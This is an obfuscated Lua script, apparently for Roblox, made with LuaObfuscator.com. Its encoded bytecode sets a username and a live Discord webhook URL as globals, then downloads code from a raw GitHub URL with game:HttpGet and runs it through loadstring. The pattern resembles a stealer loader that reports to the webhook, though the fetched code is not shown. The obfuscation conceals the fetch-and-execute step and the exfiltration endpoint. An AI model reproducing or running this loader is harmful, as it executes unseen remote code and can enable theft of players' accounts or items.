--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==4) then v16=function(v17,v18,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==1) then v30=function(v40,v41,v42)if v42 then local v85=(1703 -(362 + 349)) -(864 + 128) ;local v86;while true do if (v85==0) then v86=(v40/((7 -5)^(v41-(1 + 0))))%((4 -2)^(((v42-(1 + 0)) -(v41-(1 -0))) + (4 -(844 -(183 + 658))))) ;return v86-(v86%1) ;end end else local v87=0 -0 ;local v88;while true do if (v87==((2806 -(984 + 193)) -(1615 + 14))) then v88=(378 -(183 + 193))^(v41-(1956 -(1371 + 584))) ;return (((v40%(v88 + v88))>=v88) and (288 -(258 + 29))) or (0 + 0) ;end end end end;v31=nil;v31=function()local v48=v2(v17,v28,v28);v28=v28 + 1 ;return v48;end;v32=nil;v27=2;end if (3==v27) then v34=function()local v49=(0 -0) -0 ;local v50;local v51;local v52;local v53;local v54;local v55;while true do if (v49==(1 -0)) then v52=(1558 -912) -(518 + 127) ;v53=(v30(v51,2 -1 ,451 -(255 + 176) ) * (2^32)) + v50 ;v49=2;end if (v49==(3 + 0)) then if (v54==(0 + 0)) then if (v53==(0 + 0)) then return v55 * (1003 -(278 + 725)) ;else local v111=0 + 0 ;while true do if ((0 -(526 -(164 + 362)))==v111) then v54=2 -1 ;v52=0 -0 ;break;end end end elseif (v54==(311 + 1736)) then return ((v53==(0 + 0)) and (v55 * (1/(567 -(173 + 174 + 220))))) or (v55 * NaN) ;end return v9(v55,v54-(282 + 741) ) * (v52 + (v53/((1028 -(834 + (412 -220)))^((5 -3) + 50)))) ;end if (v49==(132 -(85 + 45))) then v54=v30(v51,21,91 -60 );v55=((v30(v51,22 + 10 )==(1 + 0)) and  -(384 -(291 + 92))) or ((3010 -1748) -(1123 + 138)) ;v49=(153 -(101 + 50)) + 1 ;end if (v49==(0 -0)) then v50=v33();v51=v33();v49=3 -2 ;end end end;v35=nil;v35=function(v43)local v56;if  not v43 then v43=v33();if (v43==(959 -(10 + 949))) then return "";end end v56=v4(v17,v28,(v28 + v43) -(1297 -(614 + 682)) );v28=v28 + v43 ;local v57={};for v77=(2497 -1644) -(42 + 810) , #v56 do v57[v77]=v3(v2(v4(v56,v77,v77)));end return v7(v57);end;v36=v33;v27=4;end if (v27==2) then v32=function()local v58,v59=v2(v17,v28,v28 + 2 );v28=v28 + (4 -2) ;return (v59 * (153 + 103)) + v58 ;end;v33=nil;v33=function()local v60,v61,v62,v63=v2(v17,v28,v28 + (4 -1) );v28=v28 + (87 -(68 + 11 + 4)) ;return (v63 * (16777852 -(181 + 455))) + (v62 * (31000 + 34536)) + (v61 * 256) + v60 ;end;v34=nil;v27=3;end if (v27==4) then v37=nil;v37=function(...)return {...},v13("#",...);end;v38=nil;v38=function()local v64=0 -0 ;local v65;local v66;local v67;local v68;local v69;local v70;local v71;local v72;local v73;while true do if ((3 -2)~=v64) then else v67=nil;v68=nil;v64=1675 -(1510 + 163) ;end if (v64==(0 + 0)) then v65=0 -0 ;v66=nil;v64=3 -2 ;end if (v64~=3) then else v71=nil;v72=nil;v64=941 -(314 + 623) ;end if (v64==4) then v73=nil;while true do if (v65~=(1992 -(158 + 1832))) then else local v102=0 + 0 ;while true do if ((443 -(405 + 38))==v102) then v70=nil;v71=nil;v102=1 + 0 ;end if ((2 -1)==v102) then v65=3;break;end end end if (v65==(12 -9)) then local v103=0;while true do if (v103==(0 + 0)) then v72=nil;v73=nil;v103=1;end if (v103==(1 + 0)) then v65=4 -0 ;break;end end end if (v65==(0 -0)) then local v104=0 -0 ;while true do if (v104~=(1 -0)) then else v65=1 -0 ;break;end if ((1114 -(545 + 569))~=v104) then else v66=0 + 0 ;v67=nil;v104=1286 -(199 + 1086) ;end end end if (v65==(626 -(590 + 32))) then while true do if (v66==1) then local v117=0;local v118;while true do if (v117==0) then v118=741 -(431 + 310) ;while true do if (v118==1) then v66=1 + 1 ;break;end if (v118==(1793 -(682 + 1111))) then local v124=795 -(494 + 301) ;while true do if (v124==1) then v118=91 -(26 + 64) ;break;end if (v124==(0 + 0)) then v69=nil;v70=nil;v124=1 + 0 ;end end end end break;end end end if (v66==3) then v73=nil;while true do local v120=1388 -(745 + 643) ;local v121;while true do if (v120==(0 -0)) then v121=215 -(131 + 84) ;while true do if (v121==(1439 -(376 + 1063))) then local v125=285 -(264 + 21) ;while true do if (v125==(0 + 0)) then if (v67==2) then local v148=1956 -(445 + 1511) ;while true do local v157=0 -0 ;local v158;while true do if (v157==(0 -0)) then v158=0 -0 ;while true do if (v158==(0 -0)) then if (v148~=(0 -0)) then else local v171=0 -0 ;while true do if (v171==(159 -(148 + 10))) then v148=1;break;end if (v171~=(0 -0)) then else for v180=1515 -(230 + 1284) ,v33() do local v181=0;local v182;local v183;while true do if (v181==(1 -0)) then while true do if (v182~=(0 -0)) then else v183=v31();if (v30(v183,188 -(29 + 158) ,988 -(69 + 918) )==0) then local v198=0 -0 ;local v199;local v200;local v201;local v202;local v203;local v204;while true do if (v198==(9 -6)) then while true do if (v199==1) then local v207=0 -0 ;while true do if (v207~=(1602 -(1009 + 592))) then else v199=1 + 1 ;break;end if (v207==(0 -0)) then v202=nil;v203=nil;v207=1 + 0 ;end end end if (0==v199) then v200=0 + 0 ;v201=nil;v199=192 -(4 + 187) ;end if (v199~=(606 -(136 + 468))) then else v204=nil;while true do if (v200==(1324 -(630 + 692))) then while true do if (v201==(1 + 0)) then local v212=0 -0 ;while true do if ((1 + 0)==v212) then v201=3 -1 ;break;end if (v212~=(0 + 0)) then else local v221=0 + 0 ;local v222;while true do if (v221~=0) then else v222=0 + 0 ;while true do if (v222~=1) then else v212=1;break;end if (v222==(0 + 0)) then local v229=1252 -(939 + 313) ;while true do if (v229==(2 -1)) then v222=1;break;end if ((0 -0)==v229) then v204={v32(),v32(),nil,nil};if (v202==(564 -(154 + 410))) then local v231=0 + 0 ;local v232;local v233;local v234;while true do if (v231==(861 -(605 + 255))) then v234=nil;while true do if (v232~=(0 + 0)) then else local v237=0 -0 ;while true do if (v237~=(1255 -(864 + 390))) then else v232=780 -(503 + 276) ;break;end if (v237==(0 + 0)) then v233=0 -0 ;v234=nil;v237=1914 -(676 + 1237) ;end end end if (v232==(1769 -(307 + 1461))) then while true do if (v233==0) then v234=0 + 0 ;while true do if (v234==(0 + 0)) then v204[2 + 1 ]=v32();v204[1 + 3 ]=v32();break;end end break;end end break;end end break;end if ((1149 -(581 + 568))==v231) then v232=158 -(155 + 3) ;v233=nil;v231=3 -2 ;end end elseif (v202==1) then v204[3]=v33();elseif (v202==(909 -(162 + 745))) then v204[1587 -(1388 + 196) ]=v33() -((4 -2)^(10 + 6)) ;elseif (v202==(8 -5)) then local v238=0 + 0 ;local v239;local v240;local v241;while true do if (v238==1) then v241=nil;while true do if (v239~=(0 + 0)) then else local v244=0 + 0 ;while true do if (v244~=1) then else v239=1 + 0 ;break;end if (v244==(0 -0)) then v240=0 + 0 ;v241=nil;v244=2 -1 ;end end end if (v239~=(1825 -(351 + 1473))) then else while true do if (v240==(986 -(110 + 876))) then v241=1633 -(1378 + 255) ;while true do if (v241==(1943 -(211 + 1732))) then v204[10 -7 ]=v33() -((3 -1)^(15 + 1)) ;v204[4]=v32();break;end end break;end end break;end end break;end if (v238~=(55 -(32 + 23))) then else v239=0 + 0 ;v240=nil;v238=1617 -(158 + 1458) ;end end end v229=1811 -(1457 + 353) ;end end end end break;end end end end end if (v201~=(1569 -(1102 + 465))) then else local v213=1537 -(535 + 1002) ;local v214;while true do if ((0 -0)~=v213) then else v214=0;while true do if ((0 + 0)==v214) then if (v30(v203,1 + 0 ,3 -2 )==(1 + 0)) then v204[741 -(319 + 420) ]=v73[v204[1 + 1 ]];end if (v30(v203,7 -5 ,2)~=1) then else v204[3]=v73[v204[3 + 0 ]];end v214=1 + 0 ;end if (v214==(1 + 0)) then v201=3 + 0 ;break;end end break;end end end if (v201~=0) then else local v215=0 -0 ;local v216;local v217;while true do if (v215==(2 -1)) then while true do if (v216~=(0 + 0)) then else v217=0;while true do if (v217~=0) then else local v230=0 -0 ;while true do if (v230==0) then v202=v30(v183,1 + 1 ,8 -5 );v203=v30(v183,3 + 1 ,6);v230=1;end if (1~=v230) then else v217=1 + 0 ;break;end end end if ((1390 -(319 + 1070))==v217) then v201=809 -(531 + 277) ;break;end end break;end end break;end if (v215~=(0 -0)) then else v216=392 -(67 + 325) ;v217=nil;v215=3 -2 ;end end end if ((483 -(246 + 234))~=v201) then else if (v30(v203,3 + 0 ,3 + 0 )~=1) then else v204[12 -8 ]=v73[v204[1 + 3 ]];end v68[v180]=v204;break;end end break;end if (v200~=(0 + 0)) then else local v208=0 + 0 ;local v209;while true do if (v208~=(0 -0)) then else v209=0 + 0 ;while true do if ((1 + 0)==v209) then v200=1;break;end if ((0 + 0)==v209) then local v223=0 -0 ;while true do if (v223~=0) then else v201=1265 -(532 + 733) ;v202=nil;v223=1;end if (v223~=1) then else v209=1;break;end end end end break;end end end if (v200==(1 + 0)) then local v210=1278 -(16 + 1262) ;local v211;while true do if (v210~=(0 -0)) then else v211=0;while true do if ((1452 -(953 + 499))~=v211) then else local v224=1106 -(1005 + 101) ;while true do if (v224~=(1889 -(1057 + 832))) then else v203=nil;v204=nil;v224=1 + 0 ;end if (v224==(2 -1)) then v211=1;break;end end end if ((1 + 0)==v211) then v200=4 -2 ;break;end end break;end end end end break;end end break;end if (v198==1) then v201=nil;v202=nil;v198=129 -(69 + 58) ;end if (v198~=(569 -(197 + 372))) then else v199=0 + 0 ;v200=nil;v198=1;end if (v198==(1439 -(1365 + 72))) then v203=nil;v204=nil;v198=1873 -(750 + 1120) ;end end end break;end end break;end if (v181==0) then v182=38 -(20 + 18) ;v183=nil;v181=1 + 0 ;end end end for v184=1836 -(82 + 1753) ,v33() do v69[v184-(1 + 0) ]=v38();end v171=1 -0 ;end end end if (v148==(2 -1)) then local v172=0;local v173;while true do if (v172==(895 -(785 + 110))) then v173=0;while true do if (v173~=(0 + 0)) then else for v190=3 -2 ,v33() do v70[v190]=v33();end return v71;end end break;end end end break;end end break;end end end end if (v67==1) then local v149=0;local v150;local v151;while true do if (v149~=(0 + 0)) then else v150=0;v151=nil;v149=1;end if (v149==(468 -(405 + 62))) then while true do if (v150==(635 -(286 + 349))) then v151=1322 -(333 + 989) ;while true do if (v151==(2 + 0)) then v67=2;break;end if (v151~=(0 + 0)) then else local v174=1943 -(1920 + 23) ;local v175;while true do if (v174==(0 -0)) then v175=0 + 0 ;while true do if (v175~=(1 + 0)) then else v151=1 + 0 ;break;end if (v175~=0) then else v72=v33();v73={};v175=2 -1 ;end end break;end end end if (v151==(1 + 0)) then local v176=0;while true do if (v176==(0 + 0)) then local v178=0 -0 ;while true do if (v178~=1) then else v176=2 -1 ;break;end if (v178==(0 -0)) then for v192=1,v72 do local v193=0;local v194;local v195;local v196;while true do if ((1707 -(689 + 1018))==v193) then local v197=0;while true do if (v197~=(1 + 0)) then else v193=1;break;end if (v197==(659 -(114 + 545))) then v194=0;v195=nil;v197=1 + 0 ;end end end if (v193==(1 + 0)) then v196=nil;while true do if (v194==(0 + 0)) then local v205=0 + 0 ;while true do if (v205==1) then v194=1 + 0 ;break;end if (v205==(857 -(324 + 533))) then v195=v31();v196=nil;v205=1261 -(310 + 950) ;end end end if (v194==(2 -1)) then if (v195==1) then v196=v31()~=0 ;elseif (v195==(1 + 1)) then v196=v34();elseif (v195==3) then v196=v35();end v73[v192]=v196;break;end end break;end end end v71[2 + 1 ]=v31();v178=1919 -(479 + 1439) ;end end end if (v176~=1) then else v151=1 + 1 ;break;end end end end break;end end break;end end end v125=1 + 0 ;end if (v125==1) then v121=1;break;end end end if (v121~=1) then else if (v67==(0 + 0)) then local v126=0 + 0 ;local v127;while true do if (v126==(0 + 0)) then v127=0 + 0 ;while true do if (v127~=1) then else local v159=1521 -(375 + 1146) ;local v160;while true do if (v159==(0 -0)) then v160=0;while true do if (v160~=1) then else v127=1 + 1 ;break;end if (v160==(1752 -(1246 + 506))) then local v177=0;while true do if (v177==(1 -0)) then v160=1260 -(1050 + 209) ;break;end if (v177==(0 -0)) then v70={};v71={v68,v69,nil,v70};v177=1 + 0 ;end end end end break;end end end if (v127==(0 + 0)) then local v161=0 + 0 ;while true do if ((1 + 0)==v161) then v127=1124 -(889 + 234) ;break;end if (v161==(0 + 0)) then v68={};v69={};v161=1934 -(1669 + 264) ;end end end if (v127~=(2 + 0)) then else v67=1 + 0 ;break;end end break;end end end break;end end break;end end end break;end if (v66~=2) then else v71=nil;v72=nil;v66=3;end if (v66==(0 -0)) then local v119=733 -(670 + 63) ;while true do if (1==v119) then v66=1;break;end if (v119~=0) then else v67=892 -(74 + 818) ;v68=nil;v119=1;end end end end break;end if (v65~=1) then else local v105=0;while true do if (v105~=1) then else v65=2;break;end if ((0 + 0)==v105) then v68=nil;v69=nil;v105=1 + 0 ;end end end end break;end if (v64==(1 + 1)) then v69=nil;v70=nil;v64=488 -(422 + 63) ;end end end;v27=5;end if (v27==5) then v39=nil;v39=function(v44,v45,v46)local v74=v44[1];local v75=v44[2];local v76=v44[3];return function(...)local v79=0;local v80;local v81;local v82;local v83;local v84;while true do if (v79==0) then v80=1;v81= -1;v79=1;end if (v79==2) then v84=nil;v84=function()local v92=v74;local v93=v75;local v94=v76;local v95=v37;local v96={};local v97={};local v98={};for v106=(499 -(60 + 439)) -0 ,v83 do if ((2138==(1927 + 211)) and (v106>=v94)) then v96[v106-v94 ]=v82[v106 + 1 + (1467 -(1285 + 182)) ];else v98[v106]=v82[v106 + (457 -(126 + 330)) ];end end local v99=(v83-v94) + (1 -0) ;local v100;local v101;while true do local v107=0;local v108;while true do if ((v107==0) or (2561<(14 + (646 -429)))) then v108=0;while true do if (((3519 -(656 + 284))>((6665 -2036) -3421)) and (v108==(2 -(888 -(267 + 620))))) then if ((v101<=(1226 -(314 + 909))) or (((19718 -10296) -6179)==(3649 -2013))) then if ((v101<=(264 -((646 -436) + 53))) or (3555>=(5208 -(272 + 351)))) then if (((3163 -(657 + 1127))<(9120 -(6242 -(150 + 79)))) and (v101>(1681 -(760 + 921)))) then v98[v100[796 -(334 + 460) ]]=v46[v100[3]];else local v130=0 -0 ;local v131;local v132;while true do if ((v130==(1 + 0)) or ((8901 -(1871 + 3288))>=(6328 -(857 + 556)))) then while true do if ((v131==(1299 -(1027 + 272))) or ((9787 -5859)<=(5148 -3372))) then v132=v100[2 + 0 ];v98[v132]=v98[v132](v14(v98,v132 + (907 -(877 + 29)) ,v81));break;end end break;end if ((v130==0) or ((2628 + 1118)<(1472 + 173))) then v131=0;v132=nil;v130=237 -(59 + 177) ;end end end elseif (((4843 -(2749 -(190 + 528)))>(3456 -(42 + 1346))) and (v101==2)) then local v133=0 + 0 ;local v134;local v135;local v136;local v137;local v138;local v139;while true do if ((v133==(0 -0)) or ((4577 + 314)<(2498 -(633 + 829)))) then v134=0 -0 ;v135=nil;v133=1 -0 ;end if (((6735 -3724)==(621 + 2390)) and (v133==(2 -0))) then v138=nil;v139=nil;v133=3;end if (((2688 -(773 + 23 + 843))<=(10013 -5741)) and (v133==(2 -1))) then v136=nil;v137=nil;v133=9 -7 ;end if ((2276>=(544 -200)) and (v133==3)) then while true do if ((v134==(1 + 1)) or ((1612 -(133 + 351))>=(5654 -2308))) then v139=nil;while true do if ((v135==(2 -0)) or ((1812 -496)>=(15837 -11085))) then for v168=v136,v81 do local v169=0;local v170;while true do if ((v169==0) or ((1353 + (2687 -(359 + 1568)))>(1135 + 2194))) then v170=0;while true do if (((1116 + 2047)>(3729 -(367 + 467))) and (v170==0)) then v139=v139 + 1 ;v98[v168]=v137[v139];break;end end break;end end end break;end if ((v135==(1549 -(427 + 1122))) or (3048==(853 + 186))) then local v164=942 -(611 + 331) ;local v165;while true do if ((v164==0) or (2709==(5226 -1346))) then v165=0;while true do if (((180 + 3802)>=(8364 -6269)) and ((279 -(268 + 10))==v165)) then v135=1873 -(1082 + (2266 -(1250 + 226))) ;break;end if ((v165==(0 + 0)) or ((380 + 1239)<(2066 -802))) then local v179=0 + 0 ;while true do if ((v179==1) or ((9167 -6771)==(5931 -(1011 + 43 + 304)))) then v165=1 + 0 ;break;end if ((3355>=((4155 + 2828) -4513)) and (v179==((0 -0) -0))) then v136=v100[2];v137,v138=v95(v98[v136](v14(v98,v136 + (1 -0) ,v100[2 + 1 ])));v179=1386 -((723 -(302 + 253)) + 1217) ;end end end end break;end end end if ((1597<(2759 -((1906 -1183) + 35))) and (v135==(1 -0))) then local v166=0 + 0 ;local v167;while true do if (((12732 -8094)>(635 + 909 + 881)) and (v166==((3435 -1855) -(998 + 296 + 286)))) then v167=0;while true do if ((v167==(666 -(626 + 39))) or ((1498 + 1376)==(21 + (223 -40)))) then v135=6 -4 ;break;end if ((4565==(4968 -(132 + 271))) and (v167==(0 + 0))) then v81=(v138 + v136) -1 ;v139=0 + 0 ;v167=1;end end break;end end end end break;end if (((287 + 1329)<=(3390 -(288 + 1022))) and (v134==1)) then v137=nil;v138=nil;v134=3 -1 ;end if (((0 + 0)==v134) or (2088<=(67 + 36))) then v135=0 -0 ;v136=nil;v134=1;end end break;end end else v98[v100[2]]=v100[10 -7 ]~=(729 -(7 + 722)) ;end elseif ((v101<=(1 + 4)) or (2343<=(2462 -1552))) then if ((((1080 + 4274) -2180)>(1150 + 787)) and (v101==4)) then local v141=192 -(25 + 167) ;local v142;local v143;while true do if (((1 + 0)==v141) or ((2026 -1458)>=(4996 -3380))) then v98[v142 + 1 ]=v143;v98[v142]=v143[v100[4]];break;end if (((4698 -2482)<(640 + 2544)) and (v141==(0 + 0))) then v142=v100[(24 -(16 + 6)) + 0 ];v143=v98[v100[5 -(4 -2) ]];v141=1 -0 ;end end else v98[v100[6 -4 ]]();end elseif ((v101<=(20 -14)) or ((2365 + 335)<2453)) then v46[v100[1 + 2 ]]=v98[v100[2]];elseif ((1978==((1375 -850) + (3539 -2086))) and (v101>(7 + 0))) then do return;end else v98[v100[1 + (2 -1) ]]=v100[161 -(82 + 76) ];end v80=v80 + ((102 -(42 + 59)) -0) ;break;end if ((v108==(0 -(0 + 0))) or (851<(1798 -(573 + 727)))) then v100=v92[v80];v101=v100[1 + 0 ];v108=1;end end break;end end end end;v79=3;end if (v79==1) then v82={...};v83=v13("#",...) -1 ;v79=2;end if (3==v79) then A,B=v37(v12(v84));if  not A[1] then local v109=0;local v110;while true do if (v109==0) then v110=v44[4][v80] or "?" ;error("Script error at ["   .. v110   .. "]:"   .. A[2] );break;end end else return v14(A,2,B);end break;end end end;end;return v39(v38(),{},v18)(...);end if (v27==0) then v28=1;v29=nil;v17=v5(v4(v17,5),"..",function(v47)if (v2(v47,2)==79) then local v89=0;while true do if (v89==0) then v29=v1(v4(v47,1,1));return "";end end else local v90=0;local v91;while true do if (v90==0) then v91=v3(v1(v47,16));if v29 then local v112=v6(v91,v29);v29=nil;return v112;else return v91;end break;end end end end);v30=nil;v27=1;end end end;v16("LOL!083O0003083O00557365724E616D6503073O002O6F676F3O3103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039333436393530353433323334323534382F36427877514D44334262495178624778446E794E66356E7639565568524A324E37384675794E564A6B663437656355784A54337848746B322D6E674379506A73492O6E78030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403323O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F507378302F412F6D61696E2F6D61696E000D3O0012073O00023O0012063O00013O0012073O00043O0012063O00033O0012013O00053O001201000100063O002004000100010007001207000300084O0003000400014O0002000100049O0000022O00053O000100012O00083O00017O000D3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00043O00053O00",v10(),...);break;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=3;end if (1==v0) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==3) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v16=nil;v0=4;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end end end
